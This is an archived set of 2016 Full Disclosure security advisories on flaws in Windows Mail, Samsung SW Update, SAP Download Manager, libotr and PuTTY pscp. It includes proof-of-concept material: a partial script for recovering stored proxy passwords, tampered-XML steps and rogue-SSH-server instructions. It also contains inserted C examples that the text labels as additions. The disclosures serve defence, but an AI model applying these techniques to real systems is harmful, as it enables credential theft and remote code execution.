Re: [FD] Windows Mail Find People DLL side loading vulnerability

2016-03-09 Thread Securify B.V.

Hi Stefan,

See below.


On 09-03-16 12:48, Stefan Kanthak wrote:

"Securify B.V." wrote:



Windows Mail Find People DLL side loading vulnerability

Yorick Koster, September 2015

This vulnerability demonstrates Microsoft's terrible SLOPPY coding
horror^Wpractice: it needs two mistakes to create this kind of bug!

"%CommonProgramFiles%\System\wab32res.dll" is (as its name implies)
a resource DLL, which means that it contains no code, but only
(localized) resources, and SHOULD (better: MUST) be loaded via
 LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
LOAD_LIBRARY_AS_DATAFILE)
to avoid the call of its DllMain() startup code!
See 

JFTR: LOAD_LIBRARY_AS_DATAFILE was introduced in the last millennium!

Either
 LoadLibrary("%CommonProgramFiles%\System\wab32res.dll")
or
 LoadLibraryEx("wab32res.dll", NULL, LOAD_LIBRARY_AS_DATAFILE)
were sufficient to avoid this vulnerability.



Fix

Microsoft released MS16-025 that fixes this vulnerability.

Have you checked how Microsoft fixed it?
Did they exercise all due diligence now, practised defense in depth
and replaced the call to
 LoadLibrary("wab32res.dll")
with a call to
 LoadLibraryEx("%CommonProgramFiles%\System\wab32res.dll", NULL, 
LOAD_LIBRARY_AS_DATAFILE)?


They still use LoadLibrary() to load wab32res.dll. Previously, they 
fetched a path from HKLM\Software\Microsoft\WAB\DLLPath and appended 
wab32res.dll to the result, which was fed into LoadLibrary().


With MS16-025 they sanitize DLLpath using PathRemoveFileSpec(). By 
default DLLPath is set to %CommonProgramFiles%\System\wab32.dll, 
PathRemoveFileSpec() removes wab32.dll from the path. They also call 
ExpandEnvironmentStrings(), but that was also the case previously.


With kind regards,

Yorick

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] [CORE-2016-0003] - Samsung SW Update Tool MiTM

2016-03-09 Thread CORE Advisories Team
1. Advisory Information

Title: Samsung SW Update Tool MiTM
Advisory ID: CORE-2016-0003
Advisory URL: http://www.coresecurity.com/advisories/samsung-sw-update-tool-mitm
Date published: 2016-03-07
Date of last update: 2016-03-04
Vendors contacted: Samsung
Release mode: Coordinated release

2. Vulnerability Information

Class: Cleartext Transmission of Sensitive Information [CWE-319], Insufficient 
Verification of Data Authenticity [CWE-345]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

 

3. Vulnerability Description

The Samsung SW Update Tool [1] is a tool that analyzes the system drivers of a 
computer. You can install relevant software for your computer easier and faster 
using SW Update. The SW Update program helps you install and update your 
software and driver easily.

Samsung [2] SW Update Tool is prone to a Man-in-the-Middle attack which could 
result in integrity corruption of the transferred data, information leak and 
consequently code execution.

4. Vulnerable Packages

Samsung SW Update Tool 2.2.5.16
Other products and versions might be affected too, but they were not tested.

5. Vendor Information, Solutions and Workarounds

Samsung published a fixed version of Samsung SW Update Tool on their website 
[1].

6. Credits

This vulnerability was discovered, researched and coordinated by Joaquin 
Rodriguez Varela from Core Security CoreLabs Team.

 

7. Technical Description / Proof of Concept Code

7.1. Clear text Transmission of Update Information

[CVE-pending-assignment-1] Depending on whether the tool runs on a Samsung 
machine or not the program behavior will be different. On some Samsung machines 
it detects automatically the model of hardware and therefore the hardware it 
uses, on other models or non-Samsung machines it requires the user to specify 
the model of machine they would like to download drivers for. Several requests 
are performed once one of these conditions is met, and eventually an XML file is 
required which will depend on the model detected/selected:

 
GET http://orcaservice.samsungmobile.com/dl/bom/MAX6356A04.XML HTTP/1.1
Host: orcaservice.samsungmobile.com
   
The name of the XML file is the model ID for which the drivers are being 
requested. In the XML file that is received from the server, there's a tag 
called 'FURL' that has the URL of the file that is going to be downloaded and 
executed by the application.

 



MAX6356A04


Nxxx-15xx
Nike-15R_BBY
MP100
MRT63

DNC
DONCR
DNC
ALL
2012-05-11 8:01:04
2012-05-11 8:01:04
Yes


BASW-83294A07
SOFTWARE
Win8-Realtek LAN Driver[Gigabit] 
8.4.907.2012-Dock_Dongle_isolate
DNC
W8PR32/W8SL32/W8ST32/W8PR64/W8SL64/W8ST64
DNC
ALL
PSTEXE
BASW-83294A\BASW-83294A07.ZIP
setup.exe
-s -f2c:\Setup.log
/pbr
10554011
5406352
C2P1
GCP
21090
SM1
ITMRQR
70
DrvVer

8.4.907.2012



Y



http://orcaservice.samsungmobile.com/FileDownloader.aspx?FILENAME=BASW-83294A07.ZIP

ENG

BRA
Driver de LAN


CZE
Ovladač sítě LAN


DAN
LAN-driver


DUT
LAN-stuurprogramma


ENG
LAN Driver
...
...
   
Once the application's search process comes to an end, it shows the user the 
available driver updates. After downloading the drivers, depending on the 
functionality mode the software is working in, the user can click on the 'Install' 
button and the binaries are executed (Function 1), or, if running in the 
"Function 2" mode, the location where the software was saved pops up in order 
for the user to execute the downloaded file.

7.1.1. Insufficient Verification of Update Authenticity

[CVE-pending-assignment-2] There is no verification at all performed by the 
software itself over the downloaded files. There are some "control" parameters 
inside the XML file:

 
...
...
RegVer
HKEY_LOCAL_MACHINE\SOFTWARE\INTEL\infInst
10.1.1.9
Version
...
...
   
But those "control" parameters can be easily disabled by manipulating the XML 
file:

 
...
...
NoVerify



...
...
   
An attacker can easily modify the returning XML file in order to achieve code 
execution on the victim's machine.

 

8. Report Timeline

2016-01-22: Core Security sent an initial notification to Samsung.

[FD] [CORE-2016-0004] - SAP Download Manager Password Weak Encryption

2016-03-09 Thread CORE Advisories Team
1. Advisory Information

Title: SAP Download Manager Password Weak Encryption
Advisory ID: CORE-2016-0004
Advisory URL: 
http://www.coresecurity.com/advisories/sap-download-manager-password-weak-encryption
Date published: 2016-03-08
Date of last update: 2016-03-07
Vendors contacted: SAP
Release mode: Coordinated release

2. Vulnerability Information

Class: Storing Passwords in a Recoverable Format [CWE-257]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-pending-assignment

 

3. Vulnerability Description

SAP Download Manager [1] is a Java application offered by SAP that allows 
downloading software packages and support notes. This program stores the user's 
settings in a configuration file. Sensitive values, such as the proxy username 
and password if set, are stored encrypted using a fixed static key.

4. Vulnerable Packages

SAP Download Manager version up to 2.1.142 (released in October 2015)
Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

SAP published the following Security Note:

2282338
It can be accessed by SAP clients in their Support Portal [4].

An updated version of SAP Download Manager can be found in their website [1].

6. Credits

This vulnerability was discovered and researched by Martin Gallo from Core 
Security Consulting Services. The publication of this advisory was coordinated 
by Joaquín Rodríguez Varela from Core Advisories Team.

 

7. Technical Description / Proof of Concept Code

SAP Download Manager is a Java application offered by SAP that allows 
downloading software packages and support notes. This program stores the user's 
settings in a configuration file. Configuration settings are stored in a Java 
HashMap object, which is serialized using Java's standard mechanism before 
being read from the configuration file. The program implemented encrypted 
storage of sensitive values since version 2.1.140a (see SAP Security Note 
2074276 [2]). User's SAP Marketplace password is not stored in the 
configuration file since version 2.1.142 (see SAP Security Note 2235412 [3]). 
However, other sensitive values, such as the user's proxy password are stored 
encrypted.

Encryption is performed using a different mechanism according to the platform 
where the program is run:

On Windows and MacOS systems, the key is composed of the computer's BIOS serial 
number concatenated with a fixed key hard-coded in the program's code, up to 16 
bytes.
On other platforms, such as Linux, the key is composed only of a fixed key 
hard-coded in the program's code.
Additionally, a transformation is performed over the value to encrypt. The code 
that handles the encryption/decryption is inside the program's 
"StringWrapper" class.

An attacker who manages to get access to a user's configuration file might be 
able to obtain the stored proxy password.

The following python script can be used as a proof of concept for retrieving 
the stored values from a configuration file:

 
#!/usr/bin/env python
# ===
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2012-2016 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==

# Standard imports
from sys import platform
from struct import pack, unpack
from optparse import OptionParser
from subprocess import check_output
# pyCrypto import
try:
    from Crypto.Cipher import AES
except ImportError:
    AES = None


# Java serialization decoding. Taken from http://stackoverflow.com/a/16470856
def parse_java(f):
    h = lambda s: ' '.join('%.2X' % ord(x) for x in s)  # format as hex
    p = lambda s: sum(ord(x)*256**i for i, x in enumerate(reversed(s)))  # parse integer
    magic = f.read(2)
    assert magic == '\xAC\xED', h(magic)  # STREAM_MAGIC
    assert p(f.read(2)) == 5  # STREAM_VERSION
    handles = []

    def parse_obj():
        b = f.read(1)
        if not b:
            raise StopIteration  # not necessarily the best thing to throw here.
        if b == '\x70':  # p TC_NULL
            return None
        elif b == '\x71':  # q TC_REFERENCE
            handle = p(f.read(4)) - 0x7E  # baseWireHandle
            o = handles[handle]
            return o[1]
        elif b == '\x74':  # t TC_STRING
            string = f.read(p(f.read(2))).decode('utf-8')
            handles.append(('TC_STRING', stri
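
The PoC above is cut off before it reaches the HashMap itself. As an added example (not part of Core's advisory or of the pysap code, and not a capture of a real SAP Download Manager configuration file), the C reader below walks the stream layout that Java's ObjectOutputStream produces for a java.util.HashMap<String,String> and pulls out the key/value pairs, which is the step needed before any decryption of the stored proxy password. The SAMPLE_STREAM bytes are hand-assembled here from the Java Object Serialization Stream Protocol, and the setting names proxyUser/proxyPassword are assumed for illustration only.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Reader for the subset of the Java Object Serialization Stream Protocol that a
 * java.util.HashMap<String,String> occupies: STREAM_MAGIC/VERSION, one TC_OBJECT
 * with an inline TC_CLASSDESC (primitive fields only), the default class data,
 * the TC_BLOCKDATA carrying buckets/size, then size key/value pairs written as
 * TC_STRING (or TC_REFERENCE back-references to an earlier string). */
#define MAX_ENTRIES 16
#define MAX_HANDLES 64

typedef struct { char key[64]; char val[128]; } kv_t;

typedef struct {
    const unsigned char *p, *end;
    const char *handles[MAX_HANDLES];   /* newHandle targets; NULL for non-strings */
    size_t nhandles;
} reader_t;

static int have(reader_t *r, size_t n) { return (size_t)(r->end - r->p) >= n; }
static int rd_u8(reader_t *r, unsigned *v)
{ if (!have(r, 1)) return -1; *v = *r->p++; return 0; }
static int rd_u16(reader_t *r, unsigned *v)
{ if (!have(r, 2)) return -1; *v = (r->p[0] << 8) | r->p[1]; r->p += 2; return 0; }
static int rd_u32(reader_t *r, uint32_t *v)
{
    if (!have(r, 4)) return -1;
    *v = ((uint32_t)r->p[0] << 24) | ((uint32_t)r->p[1] << 16) |
         ((uint32_t)r->p[2] << 8) | r->p[3];
    r->p += 4; return 0;
}
/* Modified-UTF-8 string: u16 length, then bytes; copied NUL-terminated into out. */
static int rd_utf(reader_t *r, char *out, size_t cap)
{
    unsigned n;
    if (rd_u16(r, &n) || !have(r, n) || n >= cap) return -1;
    memcpy(out, r->p, n); out[n] = '\0'; r->p += n;
    return 0;
}
static int push_handle(reader_t *r, const char *s)
{ if (r->nhandles >= MAX_HANDLES) return -1; r->handles[r->nhandles++] = s; return 0; }

/* One string-valued object: TC_STRING (gets a new handle) or TC_REFERENCE. */
static int rd_string_obj(reader_t *r, char *out, size_t cap)
{
    unsigned tc; uint32_t h;
    if (rd_u8(r, &tc)) return -1;
    if (tc == 0x74) {                                     /* TC_STRING */
        if (rd_utf(r, out, cap)) return -1;
        return push_handle(r, out);
    }
    if (tc == 0x71) {                                     /* TC_REFERENCE */
        if (rd_u32(r, &h) || h < 0x7E0000u) return -1;   /* baseWireHandle */
        h -= 0x7E0000u;
        if (h >= r->nhandles || r->handles[h] == NULL) return -1;
        if (strlen(r->handles[h]) >= cap) return -1;
        strcpy(out, r->handles[h]);
        return 0;
    }
    return -1;                                            /* not a string */
}

/* Byte size of a primitive field by typecode; 0 means object/array (rejected). */
static size_t prim_size(unsigned tc)
{
    switch (tc) {
    case 'B': case 'Z': return 1;  case 'C': case 'S': return 2;
    case 'I': case 'F': return 4;  case 'J': case 'D': return 8;
    default: return 0;
    }
}

/* Parse a serialized HashMap<String,String>; returns the entry count or -1. */
int parse_java_hashmap(const unsigned char *buf, size_t len, kv_t *out, size_t max)
{
    reader_t r = { buf, buf + len, {0}, 0 };
    unsigned tc, flags, nfields, i;
    uint32_t u, nentries;
    char name[64];
    size_t classdata = 0;

    if (!have(&r, 4) || memcmp(r.p, "\xAC\xED\x00\x05", 4)) return -1;
    r.p += 4;
    if (rd_u8(&r, &tc) || tc != 0x73) return -1;              /* TC_OBJECT */
    if (rd_u8(&r, &tc) || tc != 0x72) return -1;              /* TC_CLASSDESC */
    if (rd_utf(&r, name, sizeof name) || strcmp(name, "java.util.HashMap")) return -1;
    if (!have(&r, 8)) return -1;
    r.p += 8;                                                  /* serialVersionUID */
    if (rd_u8(&r, &flags) || !(flags & 0x02)) return -1;       /* SC_SERIALIZABLE */
    if (rd_u16(&r, &nfields)) return -1;
    for (i = 0; i < nfields; i++) {                            /* field descriptors */
        if (rd_u8(&r, &tc) || !prim_size(tc) || rd_utf(&r, name, sizeof name)) return -1;
        classdata += prim_size(tc);
    }
    if (rd_u8(&r, &tc) || tc != 0x78) return -1;              /* TC_ENDBLOCKDATA */
    if (rd_u8(&r, &tc) || tc != 0x70) return -1;              /* TC_NULL superclass */
    push_handle(&r, NULL); push_handle(&r, NULL);              /* classdesc, object */
    if (!have(&r, classdata)) return -1;
    r.p += classdata;                                          /* loadFactor, threshold */
    if (rd_u8(&r, &tc) || tc != 0x77) return -1;              /* TC_BLOCKDATA */
    if (rd_u8(&r, &tc) || tc != 8) return -1;
    if (rd_u32(&r, &u) || rd_u32(&r, &nentries)) return -1;   /* buckets, size */
    if (nentries > max) return -1;
    for (u = 0; u < nentries; u++) {
        if (rd_string_obj(&r, out[u].key, sizeof out[u].key)) return -1;
        if (rd_string_obj(&r, out[u].val, sizeof out[u].val)) return -1;
    }
    if (rd_u8(&r, &tc) || tc != 0x78) return -1;              /* TC_ENDBLOCKDATA */
    return (int)nentries;
}

/* Constructed sample (assumption: assembled by hand from the protocol, not a
 * capture): {"proxyUser": "alice", "proxyPassword": "s3cret"}. */
const unsigned char SAMPLE_STREAM[] =
    "\xAC\xED\x00\x05"                                /* STREAM_MAGIC, STREAM_VERSION */
    "\x73" "\x72" "\x00\x11" "java.util.HashMap"      /* TC_OBJECT, TC_CLASSDESC, name */
    "\x05\x07\xDA\xC1\xC3\x16\x60\xD1"                /* serialVersionUID */
    "\x03" "\x00\x02"                                 /* SC_WRITE_METHOD|SC_SERIALIZABLE, 2 fields */
    "F" "\x00\x0A" "loadFactor" "I" "\x00\x09" "threshold"
    "\x78" "\x70"                                     /* end of class desc, no superclass */
    "\x3F\x40\x00\x00" "\x00\x00\x00\x0C"             /* loadFactor 0.75f, threshold 12 */
    "\x77\x08" "\x00\x00\x00\x10" "\x00\x00\x00\x02"  /* blockdata: 16 buckets, 2 entries */
    "\x74" "\x00\x09" "proxyUser" "\x74" "\x00\x05" "alice"
    "\x74" "\x00\x0D" "proxyPassword" "\x74" "\x00\x06" "s3cret"
    "\x78";                                           /* TC_ENDBLOCKDATA */
const size_t SAMPLE_STREAM_LEN = sizeof SAMPLE_STREAM - 1;
```

Java writes a string that has already appeared in the stream (the same value under two keys, for instance) as a TC_REFERENCE rather than a second TC_STRING, so the handle table is not optional even for this small structure; non-primitive fields and arrays in the class descriptor are rejected rather than guessed at, and every read is bounds-checked, so a truncated or tampered file yields -1 instead of an over-read.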

[FD] Advisory X41-2016-001: Memory Corruption Vulnerability in "libotr"

2016-03-09 Thread X41 D-Sec GmbH Advisories

X41 D-Sec GmbH Security Advisory: X41-2016-001

Memory Corruption Vulnerability in "libotr"
===

Overview

Severity Rating: high
Confirmed Affected Version: 4.1.0 and below
Confirmed Patched Version: libotr 4.1.1
Vendor: OTR Development Team
Vendor URL: https://otr.cypherpunks.ca
Vendor Reference: OTR Security Advisory 2016-01
Vector: Remote
Credit: X41 D-Sec GmbH, Markus Vervier
Status: public
CVE: CVE-2016-2851
CVSS Score: 8.1 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2016-001-libotr/

Summary and Impact
--
A remote attacker may crash or execute arbitrary code in libotr by
sending large OTR messages.
While processing specially crafted messages, attacker controlled data on
the heap is written out of bounds.
No special user interaction or authorization is necessary in default
configurations.

Product Description
---
Off-the-Record (OTR) Messaging is a cryptographic protocol used in
well-known instant messaging clients such as Pidgin, ChatSecure, Adium
and others. It is designed to work on top of existing protocols and used
worldwide to provide secure communication in insecure environments.
OTR is regarded as highly secure and according to documents revealed by
Edward Snowden one of the protocols that the NSA is not able to decrypt
via cryptanalysis.
The most commonly used implementation of OTR is "libotr" which is a pure
C code implementation of the OTR protocol.

Analysis

During a manual code review X41 D-Sec GmbH discovered a remotely
exploitable vulnerability in libotr.

By sending large messages, an integer overflow can be triggered which
subsequently leads to a heap overflow on 64 bit architectures.

When a message of type OTRL_MSGSTATE_DATA is received during an
established OTR conversation, this message is passed to function
otrl_proto_accept_data in src/message.c line 1347:

case OTRL_MSGSTATE_ENCRYPTED:
extrakey = gcry_malloc_secure(OTRL_EXTRAKEY_BYTES);
err = otrl_proto_accept_data(&plaintext, &tlvs, context,
  message, &flags, extrakey);

After base64 decoding the message and reading various values from it,
the length of a payload is read into a variable of type "unsigned int"
in file proto.c line 784:

read_int(datalen);

It is checked that the message buffer will contain at least a "datalen"
number of bytes using read_int in proto.c line 785:

require_len(datalen);

The macros "read_int" and "require_len" are defined in src/serial.h:

#define require_len(l) do { \
    if (lenp < (l)) goto invval; \
} while(0)

#define read_int(x) do { \
    require_len(4); \
    (x) = (((unsigned int)bufp[0]) << 24) | (bufp[1] << 16) | (bufp[2] << 8) | bufp[3]; \
    bufp += 4; lenp -= 4; \
} while(0)

4 bytes are read from the message buffer and interpreted as unsigned int
value.

Subsequently a buffer of size datalen+1 is allocated using malloc
in proto.c line 786:

data = malloc(datalen+1);
if (!data) {
err = gcry_error(GPG_ERR_ENOMEM);
goto err;
}

Now data from the message is copied into this buffer using memmove in
line 791:

memmove(data, bufp, datalen);

The vulnerability is triggered if a value of 0xFFFFFFFF (MAX_UINT) is
read from the message buffer. As datalen is of size 32-bit (unsigned
int) the operation "datalen+1" will wrap around before being passed to
malloc.
This will effectively result in a zero allocation ( malloc(0) ) which is
valid in common implementations of malloc on the x86_64 architecture.
As no addition is done in the value passed to the call to memmove, 4
gigabytes of data are copied out of bounds to the heap location pointed
to by data.

Proof of Concept

In order to successfully trigger the vulnerability, an attacker must be
able to send a data message of more than 5.5 gigabytes to a victim in
order to pass the check "require_len(datalen)".
Due to the support of fragmented OTR messages assembled by libotr this
is possible in practice. By sending 275 messages of size 20MB each, X41
was able to make libotr process such a data message successfully on a
system with 8GB of ram and 15GB of swap space.
As data types for lenp and other lengths of the message are 64 bit large
size_t types on x86_64 architectures huge messages of multiple gigabytes
are possible.
Sending such a message to a pidgin client took only a few minutes on a
fast network connection without visible signs of any attack to a user.

A proof of concept triggering a heap overwrite and crash in the
pidgin-otr plugin for the popular pidgin messenger on x86_64 Linux
architectures is available[1].

The crash occurs due to the overwrite hitting unmapped memory. Using
techniques such as heap grooming, X41 was able to inflate the heap to
mo
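
The wrap described above, as an added example that is not libotr's code: the first function reproduces the 32-bit arithmetic of `datalen+1`, the second does the addition in size_t and refuses lengths it cannot represent, and `extract_data` shows the length-prefixed copy with both the `require_len`-style bound and the widened allocation. The message layout ([u32 datalen][datalen bytes]) and the byte strings used to exercise it are constructed for this demonstration.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>

/* Same big-endian arithmetic as libotr's read_int macro. */
static unsigned int read_be32(const unsigned char *p)
{
    return ((unsigned int)p[0] << 24) | ((unsigned int)p[1] << 16) |
           ((unsigned int)p[2] << 8)  |  (unsigned int)p[3];
}

/* The size expression from the vulnerable path: datalen is a 32-bit unsigned
 * int, so the addition happens in 32 bits and 0xFFFFFFFF + 1 wraps to 0 before
 * the result is widened to size_t for malloc(). */
unsigned int vulnerable_alloc_size(unsigned int datalen)
{
    return datalen + 1;
}

/* Hardened: widen first, then add, and refuse a length that cannot be
 * represented (only reachable where size_t is 32 bits). Returns 0 with the
 * size in *out, or -1 on overflow. */
int safe_alloc_size(unsigned int datalen, size_t *out)
{
    size_t wide = (size_t)datalen;
    if (wide > SIZE_MAX - 1) return -1;
    *out = wide + 1;
    return 0;
}

/* Stand-in for the tail of accept_data: [u32 datalen][datalen bytes]. lenp is
 * size_t as in libotr. Copies the payload into a fresh NUL-terminated buffer.
 * Returns 0 on success (caller frees *data), -1 on a short message or
 * allocation failure. */
int extract_data(const unsigned char *bufp, size_t lenp,
                 unsigned char **data, size_t *datalen_out)
{
    unsigned int datalen;
    size_t alloc;

    if (lenp < 4) return -1;                   /* require_len(4) */
    datalen = read_be32(bufp);
    bufp += 4; lenp -= 4;
    if (lenp < datalen) return -1;             /* require_len(datalen) */
    if (safe_alloc_size(datalen, &alloc)) return -1;
    *data = malloc(alloc);                     /* alloc == datalen + 1, never 0 */
    if (!*data) return -1;
    memcpy(*data, bufp, datalen);              /* exactly datalen bytes fit */
    (*data)[datalen] = '\0';
    *datalen_out = datalen;
    return 0;
}
```

On x86_64 the hardened path accepts 0xFFFFFFFF because size_t is 64 bits and the allocation honestly asks for 4 GiB plus one byte; whether a chat library should ever grant that is a separate policy question (a cap on datalen well below that is the obvious complement), but it no longer allocates zero bytes and then copies four gigabytes into them.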

[FD] CVE-2016-2563 - PuTTY/PSCP <=0.66 buffer overflow - vuln-pscp-sink-sscanf

2016-03-09 Thread oststrom (public)
A potential addition to your honeypots.


Author: 
Ref:
https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563
Version:0.1
Date:   Feb 20th, 2016

Tag:putty pscp client-side post-auth stack buffer overwrite when
processing remote file size 

Overview


Name:   putty
Vendor: sgtatham
References: * http://www.chiark.greenend.org.uk/~sgtatham/putty/ [1]

Version:0.66 [2]
Latest Version: 0.66
Other Versions: 0.59 [3] (~9 years ago) <= affected <= 0.66
Platform(s):win/nix
Technology: c

Vuln Classes:   stack buffer overwrite (CWE-121)
Origin: remote
Min. Privs.:post auth

CVE:CVE-2016-2563



Description
---

quote website [1]

>PuTTY is a free implementation of SSH and Telnet for Windows and Unix
platforms, along with an xterm terminal emulator. It is written and
maintained primarily by Simon Tatham.


Summary 
---

The putty SCP command-line utility (pscp) is missing a bounds-check for a stack
buffer when processing the SCP-SINK file-size response to a SCP download request.
This may allow a malicious server to overwrite the stack buffer within the client
application, potentially leading to remote code execution.

PoC see ref github.
Patch see ref github.


Besides that, two minor issues have been reported in putty packet handling:

* DoS condition in the parsing of SSH-Strings that lead to a nullptr read.
(connect putty to `poc.py` and type `x11exploit` to trigger one occurrence
of a crash, also works with x11forwarding disabled in putty)
* DoS condition in the handling of unrequested forwarded-tcpip channels open
requests that lead to a nullptr read. (connect putty to `poc.py` and type
`forwardedtcpipcrash` to trigger crash)

Details
---

The vulnerable code is located in `pscp.c` [4] line 1498 (HEAD) and is based on an
unbound `sscanf` string format descriptor storing an arbitrary length string in
a 40-byte fixed size stack buffer `sizestr[40]`.

Inline annotations are prefixed with `//#!`

1491 /*
1492  * If we get here, we must have seen SCP_SINK_FILE or
1493  * SCP_SINK_DIR.
1494  */
1495 {
1496 char sizestr[40];   //#! fixed size buffer
1497 
1498 if (sscanf(act->buf, "%lo %s %n", &act->permissions,   //#! unbound cstr %s written to sizestr
1499            sizestr, &i) != 2)



Proof of Concept


Prerequisites: 

* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for
python 2.x
* make sure `poc.py` and `test_rsa.key` are in the same folder

poc:

Usage:   []
Default:  0.0.0.0:22

1. start the malicious sshd by running `poc.py` which by default will bind
all ips, port 22.

INFO monkey-patch paramiko.Transport.open_channel
INFO monkey-patch paramiko.Transport._check_banner
INFO --start--
INFO ServerHostKey: 60733844cb5186657fdedaa22b5a57d5
INFO BIND: ('0.0.0.0', 22)
INFO Listening for connection ...
...

2. try to retrieve any file from the malicious sshd by executing `pscp`.
Provide any user/password/pubkey, the server will just accept anything.

c:\> pscp.exe -scp root@localhost:/etc/passwd .
root@localhost's password: anything

3. key-exchange and authentication

...
INFO new peer: ('127.0.0.1', 6127)
DEBUGstarting thread (server mode): 0x2411750L
INFO Connected (version 2.0, client PuTTY_Release_0.66)
DEBUGkex algos:[u'diffie-hellman-group-exchange-sha256',
u'diffie-hellman-group-exchange-sha1', u'diffie-hellman-group14-sha1',
u'diffie-hellman-group1-sha1', u'rsa2048-sha256', u'rsa1024-sha1'] server
key:[u'ssh-rsa', u'ssh-dss'] client encrypt:[u'aes256-ctr', u'aes256-cbc',
u'rijndael-...@lysator.liu.se', u'aes192-ctr', u'aes192-cbc', u'aes128-ctr',
u'aes128-cbc', u'blowfish-ctr', u'blowfish-cbc', u'3des-ctr', u'3des-cbc',
u'arcfour256', u'arcfour128'] server encrypt:[u'aes256-ctr', u'aes256-cbc',
u'rijndael-...@lysator.liu.se', u'aes192-ctr', u'aes192-cbc', u'aes128-ctr',
u'aes128-cbc', u'blowfish-ctr', u'blowfish-cbc', u'3des-ctr', u'3des-cbc',
u'arcfour256', u'arcfour128'] client mac:[u'hmac-sha2-256', u'hmac-sha1',
u'hmac-sha1-96', u'hmac-md5'] server mac:[u'hmac-sha2-256', u'hmac-sha1',
u'hmac-sha1-96', u'hmac-md5'] client compress:[u'none', u'zlib'] server
compress:[u'none', u'zlib'] client lang:[u''] server lang:[u''] kex
follows?False
DEBUGCiphers agreed: local=aes256-ctr, remote=aes256-ctr
DEBUGusing kex diffie-hellman-group14-sha1; server key type ssh-rsa;
cipher: local aes256-ctr, remote aes256-ctr; mac: local hmac-sha1, remote
hmac-sha1; compression: local none, remote none
DEBUGSwitch to new keys ...
DEBUGAuth request (type=none) service=ssh-connection, username=root
INFO Auth rejected (none).
INFO REQUEST: allowed auths:
gssapi-keyex,gssapi-with-mic,password,publickey
DEBUGAuth request (type=gssapi-with-mic) service=ssh-connection,
username=root
INFO  
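
The sscanf pattern above beside a bounded version, as an added example that is neither pscp's code nor the poc.py from the referenced repository. The vulnerable function keeps pscp's `"%lo %s %n"` conversion into a 40-byte stack buffer; the hardened one limits the field to 39 bytes, detects an over-long field because the byte after a truncated conversion is then not the separating space, and validates the size as a decimal number. The header strings are constructed, and it is assumed the leading SCP type byte ('C' or 'D') has already been consumed before the line reaches the parser.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <ctype.h>

#define SIZESTR_LEN 40

/* As in pscp.c: "%s" carries no width, so a size field longer than 39 bytes
 * runs past sizestr. Kept for comparison only; never feed it server data. */
int parse_sink_header_vulnerable(const char *buf, unsigned long *perm,
                                 unsigned long long *size, const char **name)
{
    char sizestr[SIZESTR_LEN];
    int i = -1;
    if (sscanf(buf, "%lo %s %n", perm, sizestr, &i) != 2 || i < 0) return -1;
    *size = strtoull(sizestr, NULL, 10);
    *name = buf + i;
    return 0;
}

/* Hardened: the width in "%39s" must stay SIZESTR_LEN - 1 (the compiler will
 * not check that for you). %n records where the conversion stopped; if the
 * next byte is not the separating space the field was longer than 39 bytes
 * (or the filename is missing) and the line is rejected instead of truncated.
 * The size must be all digits and fit in unsigned long long. */
int parse_sink_header_safe(const char *buf, unsigned long *perm,
                           unsigned long long *size, const char **name)
{
    char sizestr[SIZESTR_LEN];
    char *end;
    int i = -1;
    if (sscanf(buf, "%lo %39s%n", perm, sizestr, &i) != 2 || i < 0) return -1;
    if (buf[i] != ' ') return -1;                 /* truncated field or no filename */
    if (!isdigit((unsigned char)sizestr[0])) return -1;
    errno = 0;
    *size = strtoull(sizestr, &end, 10);
    if (errno == ERANGE || *end != '\0') return -1;
    *name = buf + i + 1;
    if (**name == '\0') return -1;
    return 0;
}

/* Constructed malicious header: a 200-digit size field such as a rogue scp
 * sink could send. Returns the safe parser's verdict (-1 expected). */
int reject_overlong_size_field(void)
{
    char evil[256];
    unsigned long perm; unsigned long long size; const char *name;
    memset(evil, 0, sizeof evil);
    strcpy(evil, "0644 ");
    memset(evil + 5, '9', 200);
    strcpy(evil + 205, " passwd");
    return parse_sink_header_safe(evil, &perm, &size, &name);
}
```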

[FD] New Security Tool: MrLooquer - IPv6 Intelligence

2016-03-09 Thread Rafa Sanchez
Dear colleagues,

Please, allow us to introduce MrLooquer -> https://www.mrlooquer.com

MrLooquer combines open source intelligence techniques with heuristic and
data mining to perform one of the first attempts to create a real map about
IPv6 deployment and its relationship with current networks and protocols.

MrLooquer is born as an open initiative with Creative Commons license
focused on:
- Data discovery
- Visual intelligence
- Relationship

Our main goal is to provide a useful tool for security analysts around the
world. MrLooquer allows users to make advanced queries through our big data
infrastructure to obtain datasets with relationships between domains, IPv4,
IPv6, service information, geolocation, etc...

We've released the first version recently. It's just the bread and
butter... We are developing a roadmap that includes, among other things,
threat indicators based on relationships and patterns.

Please, feel free to start using it and we would be thankful for any type
of feedback.

Best regards,
MrLooquer team.

Web: https://www.mrlooquer.com
Twitter: https://twitter.com/mrlooquer
Blog: http://blog.mrlooquer.com/

security focus - pen-t...@securityfocus.com
ipv6 hackers - ipv6hack...@lists.si6networks.com
full disclosure - fulldisclosure@seclists.org



[FD] Thomson TWG850 Wireless Router Multiple Vulnerabilities

2016-03-09 Thread Sebastian Perez
[System Affected]
Thomson Router
HW Revision 2.0
VENDOR Thomson
BOOT Revision 2.1.7i
MODEL TWG850-4U
